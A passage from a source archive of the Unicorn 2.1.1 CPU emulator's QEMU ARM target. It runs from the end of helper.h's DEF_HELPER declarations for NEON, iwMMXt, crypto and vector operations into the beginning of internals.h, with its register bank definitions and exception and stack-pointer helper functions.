i32, i32) DEF_HELPER_3(neon_qrshl_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_u32, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qrshl_u64, i64, env, i64, i64) DEF_HELPER_3(neon_qrshl_s64, i64, env, i64, i64) DEF_HELPER_2(neon_add_u8, i32, i32, i32) DEF_HELPER_2(neon_add_u16, i32, i32, i32) DEF_HELPER_2(neon_padd_u8, i32, i32, i32) DEF_HELPER_2(neon_padd_u16, i32, i32, i32) DEF_HELPER_2(neon_sub_u8, i32, i32, i32) DEF_HELPER_2(neon_sub_u16, i32, i32, i32) DEF_HELPER_2(neon_mul_u8, i32, i32, i32) DEF_HELPER_2(neon_mul_u16, i32, i32, i32) DEF_HELPER_2(neon_tst_u8, i32, i32, i32) DEF_HELPER_2(neon_tst_u16, i32, i32, i32) DEF_HELPER_2(neon_tst_u32, i32, i32, i32) DEF_HELPER_2(neon_ceq_u8, i32, i32, i32) DEF_HELPER_2(neon_ceq_u16, i32, i32, i32) DEF_HELPER_2(neon_ceq_u32, i32, i32, i32) DEF_HELPER_1(neon_clz_u8, i32, i32) DEF_HELPER_1(neon_clz_u16, i32, i32) DEF_HELPER_1(neon_cls_s8, i32, i32) DEF_HELPER_1(neon_cls_s16, i32, i32) DEF_HELPER_1(neon_cls_s32, i32, i32) DEF_HELPER_1(neon_cnt_u8, i32, i32) DEF_HELPER_FLAGS_1(neon_rbit_u8, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_3(neon_qdmulh_s16, i32, env, i32, i32) DEF_HELPER_3(neon_qrdmulh_s16, i32, env, i32, i32) DEF_HELPER_4(neon_qrdmlah_s16, i32, env, i32, i32, i32) DEF_HELPER_4(neon_qrdmlsh_s16, i32, env, i32, i32, i32) DEF_HELPER_3(neon_qdmulh_s32, i32, env, i32, i32) DEF_HELPER_3(neon_qrdmulh_s32, i32, env, i32, i32) DEF_HELPER_4(neon_qrdmlah_s32, i32, env, s32, s32, s32) DEF_HELPER_4(neon_qrdmlsh_s32, i32, env, s32, s32, s32) DEF_HELPER_1(neon_narrow_u8, i32, i64) DEF_HELPER_1(neon_narrow_u16, i32, i64) DEF_HELPER_2(neon_unarrow_sat8, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_u8, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_s8, i32, env, i64) DEF_HELPER_2(neon_unarrow_sat16, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_u16, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_s16, i32, env, i64) DEF_HELPER_2(neon_unarrow_sat32, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_u32, i32, env, i64) DEF_HELPER_2(neon_narrow_sat_s32, i32, env, i64) DEF_HELPER_1(neon_narrow_high_u8, i32, i64) DEF_HELPER_1(neon_narrow_high_u16, i32, i64) DEF_HELPER_1(neon_narrow_round_high_u8, i32, i64) DEF_HELPER_1(neon_narrow_round_high_u16, i32, i64) DEF_HELPER_1(neon_widen_u8, i64, i32) DEF_HELPER_1(neon_widen_s8, i64, i32) DEF_HELPER_1(neon_widen_u16, i64, i32) DEF_HELPER_1(neon_widen_s16, i64, i32) DEF_HELPER_2(neon_addl_u16, i64, i64, i64) DEF_HELPER_2(neon_addl_u32, i64, i64, i64) DEF_HELPER_2(neon_paddl_u16, i64, i64, i64) DEF_HELPER_2(neon_paddl_u32, i64, i64, i64) DEF_HELPER_2(neon_subl_u16, i64, i64, i64) DEF_HELPER_2(neon_subl_u32, i64, i64, i64) DEF_HELPER_3(neon_addl_saturate_s32, i64, env, i64, i64) DEF_HELPER_3(neon_addl_saturate_s64, i64, env, i64, i64) DEF_HELPER_2(neon_abdl_u16, i64, i32, i32) DEF_HELPER_2(neon_abdl_s16, i64, i32, i32) DEF_HELPER_2(neon_abdl_u32, i64, i32, i32) DEF_HELPER_2(neon_abdl_s32, i64, i32, i32) DEF_HELPER_2(neon_abdl_u64, i64, i32, i32) DEF_HELPER_2(neon_abdl_s64, i64, i32, i32) DEF_HELPER_2(neon_mull_u8, i64, i32, i32) DEF_HELPER_2(neon_mull_s8, i64, i32, i32) DEF_HELPER_2(neon_mull_u16, i64, i32, i32) DEF_HELPER_2(neon_mull_s16, i64, i32, i32) DEF_HELPER_1(neon_negl_u16, i64, i64) DEF_HELPER_1(neon_negl_u32, i64, i64) DEF_HELPER_FLAGS_2(neon_qabs_s8, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qabs_s16, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qabs_s32, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qabs_s64, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_2(neon_qneg_s8, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qneg_s16, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qneg_s32, TCG_CALL_NO_RWG, i32, env, i32) DEF_HELPER_FLAGS_2(neon_qneg_s64, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_3(neon_abd_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_ceq_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_cge_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_cgt_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_acge_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_acgt_f32, i32, i32, i32, ptr) DEF_HELPER_3(neon_acge_f64, i64, i64, i64, ptr) DEF_HELPER_3(neon_acgt_f64, i64, i64, i64, ptr) /* iwmmxt_helper.c */ DEF_HELPER_2(iwmmxt_maddsq, i64, i64, i64) DEF_HELPER_2(iwmmxt_madduq, i64, i64, i64) DEF_HELPER_2(iwmmxt_sadb, i64, i64, i64) DEF_HELPER_2(iwmmxt_sadw, i64, i64, i64) DEF_HELPER_2(iwmmxt_mulslw, i64, i64, i64) DEF_HELPER_2(iwmmxt_mulshw, i64, i64, i64) DEF_HELPER_2(iwmmxt_mululw, i64, i64, i64) DEF_HELPER_2(iwmmxt_muluhw, i64, i64, i64) DEF_HELPER_2(iwmmxt_macsw, i64, i64, i64) DEF_HELPER_2(iwmmxt_macuw, i64, i64, i64) DEF_HELPER_1(iwmmxt_setpsr_nz, i32, i64) #define DEF_IWMMXT_HELPER_SIZE_ENV(name) \ DEF_HELPER_3(iwmmxt_##name##b, i64, env, i64, i64) \ DEF_HELPER_3(iwmmxt_##name##w, i64, env, i64, i64) \ DEF_HELPER_3(iwmmxt_##name##l, i64, env, i64, i64) \ DEF_IWMMXT_HELPER_SIZE_ENV(unpackl) DEF_IWMMXT_HELPER_SIZE_ENV(unpackh) DEF_HELPER_2(iwmmxt_unpacklub, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackluw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklul, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhub, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhuw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhul, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklsb, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklsw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpacklsl, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhsb, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhsw, i64, env, i64) DEF_HELPER_2(iwmmxt_unpackhsl, i64, env, i64) DEF_IWMMXT_HELPER_SIZE_ENV(cmpeq) DEF_IWMMXT_HELPER_SIZE_ENV(cmpgtu) DEF_IWMMXT_HELPER_SIZE_ENV(cmpgts) DEF_IWMMXT_HELPER_SIZE_ENV(mins) DEF_IWMMXT_HELPER_SIZE_ENV(minu) DEF_IWMMXT_HELPER_SIZE_ENV(maxs) DEF_IWMMXT_HELPER_SIZE_ENV(maxu) DEF_IWMMXT_HELPER_SIZE_ENV(subn) DEF_IWMMXT_HELPER_SIZE_ENV(addn) DEF_IWMMXT_HELPER_SIZE_ENV(subu) DEF_IWMMXT_HELPER_SIZE_ENV(addu) DEF_IWMMXT_HELPER_SIZE_ENV(subs) DEF_IWMMXT_HELPER_SIZE_ENV(adds) DEF_HELPER_3(iwmmxt_avgb0, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_avgb1, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_avgw0, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_avgw1, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_align, i64, i64, i64, i32) DEF_HELPER_4(iwmmxt_insr, i64, i64, i32, i32, i32) DEF_HELPER_1(iwmmxt_bcstb, i64, i32) DEF_HELPER_1(iwmmxt_bcstw, i64, i32) DEF_HELPER_1(iwmmxt_bcstl, i64, i32) DEF_HELPER_1(iwmmxt_addcb, i64, i64) DEF_HELPER_1(iwmmxt_addcw, i64, i64) DEF_HELPER_1(iwmmxt_addcl, i64, i64) DEF_HELPER_1(iwmmxt_msbb, i32, i64) DEF_HELPER_1(iwmmxt_msbw, i32, i64) DEF_HELPER_1(iwmmxt_msbl, i32, i64) DEF_HELPER_3(iwmmxt_srlw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_srll, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_srlq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sllw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_slll, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sllq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sraw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sral, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_sraq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_rorw, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_rorl, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_rorq, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_shufh, i64, env, i64, i32) DEF_HELPER_3(iwmmxt_packuw, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packul, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packuq, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packsw, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packsl, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_packsq, i64, env, i64, i64) DEF_HELPER_3(iwmmxt_muladdsl, i64, i64, i32, i32) DEF_HELPER_3(iwmmxt_muladdsw, i64, i64, i32, i32) DEF_HELPER_3(iwmmxt_muladdswl, i64, i64, i32, i32) DEF_HELPER_FLAGS_2(neon_unzip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_unzip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qunzip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qunzip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qunzip32, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_zip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_zip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qzip8, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qzip16, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(neon_qzip32, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_aese, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_3(crypto_aesmc, TCG_CALL_NO_RWG, void, ptr, ptr, i32) DEF_HELPER_FLAGS_4(crypto_sha1_3reg, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_2(crypto_sha1h, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sha1su1, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha256h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha256h2, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sha256su0, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha256su1, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha512h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha512h2, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sha512su0, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sha512su1, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_5(crypto_sm3tt, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32, i32) DEF_HELPER_FLAGS_3(crypto_sm3partw1, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sm3partw2, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_2(crypto_sm4e, TCG_CALL_NO_RWG, void, ptr, ptr) DEF_HELPER_FLAGS_3(crypto_sm4ekey, TCG_CALL_NO_RWG, void, ptr, ptr, ptr) DEF_HELPER_FLAGS_3(crc32, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_FLAGS_3(crc32c, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlah_s16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlsh_s16, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlah_s32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_qrdmlsh_s32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_idx_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_idx_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sdot_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_udot_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcaddh, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcadds, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcaddd, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlah, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlah_idx, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlas, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlas_idx, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fcmlad, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frecpe_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frecpe_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frecpe_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frsqrte_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frsqrte_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_frsqrte_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_ftsmul_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_ftsmul_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_ftsmul_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_idx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmul_idx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(gvec_fmla_idx_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(gvec_fmla_idx_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_6(gvec_fmla_idx_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqadd_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqadd_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqadd_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqadd_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqsub_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_uqsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqsub_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqsub_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqsub_s, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_sqsub_d, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmlal_a32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmlal_a64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmlal_idx_a32, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_5(gvec_fmlal_idx_a64, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_2(frint32_s, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(frint64_s, TCG_CALL_NO_RWG, f32, f32, ptr) DEF_HELPER_FLAGS_2(frint32_d, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_2(frint64_d, TCG_CALL_NO_RWG, f64, f64, ptr) DEF_HELPER_FLAGS_4(gvec_sshl_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_sshl_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ushl_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_ushl_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_pmul_b, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(gvec_pmull_q, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) DEF_HELPER_FLAGS_4(neon_pmull_h, TCG_CALL_NO_RWG, void, ptr, ptr, ptr, i32) #ifdef TARGET_AARCH64 #include "helper-a64.h" #include "helper-sve.h" #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/internals.h�����������������������������������������������������������0000664�0000000�0000000�00000112242�14675241067�0020372�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU ARM CPU -- internal functions and types * * Copyright (c) 2014 Linaro Ltd * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> * * This header defines functions, types, etc which need to be shared * between different source files within target/arm/ but which are * private to it and not required by the rest of QEMU. */ #ifndef TARGET_ARM_INTERNALS_H #define TARGET_ARM_INTERNALS_H #include "hw/registerfields.h" struct uc_struct; /* register banks for CPU modes */ #define BANK_USRSYS 0 #define BANK_SVC 1 #define BANK_ABT 2 #define BANK_UND 3 #define BANK_IRQ 4 #define BANK_FIQ 5 #define BANK_HYP 6 #define BANK_MON 7 static inline bool excp_is_internal(int excp) { /* Return true if this exception number represents a QEMU-internal * exception that will not be passed to the guest. */ return excp == EXCP_INTERRUPT || excp == EXCP_HLT || excp == EXCP_DEBUG || excp == EXCP_HALTED || excp == EXCP_EXCEPTION_EXIT || excp == EXCP_KERNEL_TRAP || excp == EXCP_SEMIHOST; } /* Scale factor for generic timers, ie number of ns per tick. * This gives a 62.5MHz timer. */ #define GTIMER_SCALE 16 /* Bit definitions for the v7M CONTROL register */ FIELD(V7M_CONTROL, NPRIV, 0, 1) FIELD(V7M_CONTROL, SPSEL, 1, 1) FIELD(V7M_CONTROL, FPCA, 2, 1) FIELD(V7M_CONTROL, SFPA, 3, 1) /* Bit definitions for v7M exception return payload */ FIELD(V7M_EXCRET, ES, 0, 1) FIELD(V7M_EXCRET, RES0, 1, 1) FIELD(V7M_EXCRET, SPSEL, 2, 1) FIELD(V7M_EXCRET, MODE, 3, 1) FIELD(V7M_EXCRET, FTYPE, 4, 1) FIELD(V7M_EXCRET, DCRS, 5, 1) FIELD(V7M_EXCRET, S, 6, 1) FIELD(V7M_EXCRET, RES1, 7, 25) /* including the must-be-1 prefix */ /* Minimum value which is a magic number for exception return */ #define EXC_RETURN_MIN_MAGIC 0xff000000 /* Minimum number which is a magic number for function or exception return * when using v8M security extension */ #define FNC_RETURN_MIN_MAGIC 0xfefffffe /* We use a few fake FSR values for internal purposes in M profile. * M profile cores don't have A/R format FSRs, but currently our * get_phys_addr() code assumes A/R profile and reports failures via * an A/R format FSR value. We then translate that into the proper * M profile exception and FSR status bit in arm_v7m_cpu_do_interrupt(). * Mostly the FSR values we use for this are those defined for v7PMSA, * since we share some of that codepath. A few kinds of fault are * only for M profile and have no A/R equivalent, though, so we have * to pick a value from the reserved range (which we never otherwise * generate) to use for these. * These values will never be visible to the guest. */ #define M_FAKE_FSR_NSC_EXEC 0xf /* NS executing in S&NSC memory */ #define M_FAKE_FSR_SFAULT 0xe /* SecureFault INVTRAN, INVEP or AUVIOL */ /** * raise_exception: Raise the specified exception. * Raise a guest exception with the specified value, syndrome register * and target exception level. This should be called from helper functions, * and never returns because we will longjump back up to the CPU main loop. */ void QEMU_NORETURN raise_exception(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el); /* * Similarly, but also use unwinding to restore cpu state. */ void QEMU_NORETURN raise_exception_ra(CPUARMState *env, uint32_t excp, uint32_t syndrome, uint32_t target_el, uintptr_t ra); /* * For AArch64, map a given EL to an index in the banked_spsr array. * Note that this mapping and the AArch32 mapping defined in bank_number() * must agree such that the AArch64<->AArch32 SPSRs have the architecturally * mandated mapping between each other. */ static inline unsigned int aarch64_banked_spsr_index(unsigned int el) { static const unsigned int map[4] = { [1] = BANK_SVC, /* EL1. */ [2] = BANK_HYP, /* EL2. */ [3] = BANK_MON, /* EL3. */ }; assert(el >= 1 && el <= 3); return map[el]; } /* Map CPU modes onto saved register banks. */ static inline int bank_number(int mode) { switch (mode) { case ARM_CPU_MODE_USR: case ARM_CPU_MODE_SYS: return BANK_USRSYS; case ARM_CPU_MODE_SVC: return BANK_SVC; case ARM_CPU_MODE_ABT: return BANK_ABT; case ARM_CPU_MODE_UND: return BANK_UND; case ARM_CPU_MODE_IRQ: return BANK_IRQ; case ARM_CPU_MODE_FIQ: return BANK_FIQ; case ARM_CPU_MODE_HYP: return BANK_HYP; case ARM_CPU_MODE_MON: return BANK_MON; } g_assert_not_reached(); // never reach return BANK_MON; } /** * r14_bank_number: Map CPU mode onto register bank for r14 * * Given an AArch32 CPU mode, return the index into the saved register * banks to use for the R14 (LR) in that mode. This is the same as * bank_number(), except for the special case of Hyp mode, where * R14 is shared with USR and SYS, unlike its R13 and SPSR. * This should be used as the index into env->banked_r14[], and * bank_number() used for the index into env->banked_r13[] and * env->banked_spsr[]. */ static inline int r14_bank_number(int mode) { return (mode == ARM_CPU_MODE_HYP) ? BANK_USRSYS : bank_number(mode); } void arm_cpu_register_gdb_regs_for_features(ARMCPU *cpu); void arm_translate_init(struct uc_struct *uc); enum arm_fprounding { FPROUNDING_TIEEVEN, FPROUNDING_POSINF, FPROUNDING_NEGINF, FPROUNDING_ZERO, FPROUNDING_TIEAWAY, FPROUNDING_ODD }; int arm_rmode_to_sf(int rmode); static inline void aarch64_save_sp(CPUARMState *env, int el) { if (env->pstate & PSTATE_SP) { env->sp_el[el] = env->xregs[31]; } else { env->sp_el[0] = env->xregs[31]; } } static inline void aarch64_restore_sp(CPUARMState *env, int el) { if (env->pstate & PSTATE_SP) { env->xregs[31] = env->sp_el[el]; } else { env->xregs[31] = env->sp_el[0]; } } static inline void update_spsel(CPUARMState *env, uint32_t imm) { unsigned int cur_el = arm_current_el(env); /* Update PSTATE SPSel bit; this requires us to update the * working stack pointer in xregs[31]. */ if (!((imm ^ env->pstate) & PSTATE_SP)) { return; } aarch64_save_sp(env, cur_el); env->pstate = deposit32(env->pstate, 0, 1, imm); /* We rely on illegal updates to SPsel from EL0 to get trapped * at translation time. */ assert(cur_el >= 1 && cur_el <= 3); aarch64_restore_sp(env, cur_el); } /* * 